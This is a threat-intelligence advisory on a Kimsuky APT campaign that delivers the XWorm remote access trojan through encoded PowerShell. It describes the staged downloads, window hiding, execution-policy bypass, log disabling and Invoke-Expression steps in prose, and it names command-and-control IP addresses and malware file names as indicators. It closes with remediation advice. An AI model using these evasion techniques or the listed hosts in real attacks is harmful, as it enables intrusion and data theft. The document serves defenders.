Analysis Summary

Cybersecurity researchers have uncovered a highly sophisticated malware campaign by the Kimsuky Advanced Persistent Threat (APT) group, utilizing intricately crafted PowerShell payloads to deploy the XWorm Remote Access Trojan (RAT). This campaign demonstrates Kimsuky's advanced capabilities through the use of encoded scripts and multi-stage attack chains designed to infiltrate systems, evade security defenses, and maintain covert remote access. The operation primarily focuses on data exfiltration and establishing persistent access, leveraging techniques like fileless execution and Living-off-the-Land Binaries and Scripts (LOLBAS) to remain undetected.

The attack begins with Base64-encoded PowerShell scripts, which, once decoded, initiate a series of malicious actions. These scripts download RAR archives, binaries such as orwartde.exe, and additional PowerShell scripts masked as harmless text files from known malicious IP addresses, notably 185.235.128.114 and 92.119.114.128. These IPs also facilitate active command-and-control (C2) communication, enabling further payload downloads and data exfiltration. A key technique used involves embedding inline C# code within PowerShell to invoke the Win32 API ShowWindow, effectively hiding terminal windows and keeping malicious activity out of sight.

To enhance deception, the attackers download decoy PDF files that distract victims while other malware components, including eworvolt.exe and enwtsv.exe, execute in the background. These payloads may run multiple times to ensure successful deployment across different stages. ExecutionPolicy Bypass is used to run scripts dynamically, along with tactics like disabling Windows Event Logging for defense evasion. The campaign further employs password-protected archives and delayed execution methods to synchronize multi-step processes. Hidden malicious content within files such as ov_er15z.txt is executed via Invoke-Expression, marking the stage where the core payload—ranging from remote access to keylogging—is activated. Kimsuky’s use of obfuscation, encoded C2 traffic, and native system tools underscores their evolving sophistication in targeting high-value networks.

Impact

• Unauthorized Remote Access
• Data Exfiltration
• Credential Theft

Indicators of Compromise

Remediation

• Regularly apply security patches, especially for Windows and PowerShell-related vulnerabilities.
• Restrict PowerShell usage to authorized users and implement logging for script execution.
• Monitor network traffic for unusual outbound connections, especially to known malicious IPs.
• Disable or restrict LOLBAS execution through Group Policy or application control.
• Use strong endpoint detection and response (EDR) tools to detect fileless malware activity.
• Enable Windows Event Logging and monitor for suspicious behavior or tampering.
• Block known malicious IPs (e.g., 185.235.128.114, 92.119.114.128) at the firewall level.
• Enforce least-privilege access and remove unnecessary administrative rights.
• Deploy email and web filtering to prevent phishing and initial payload delivery.
• Conduct regular security awareness training to help users recognize suspicious files or links.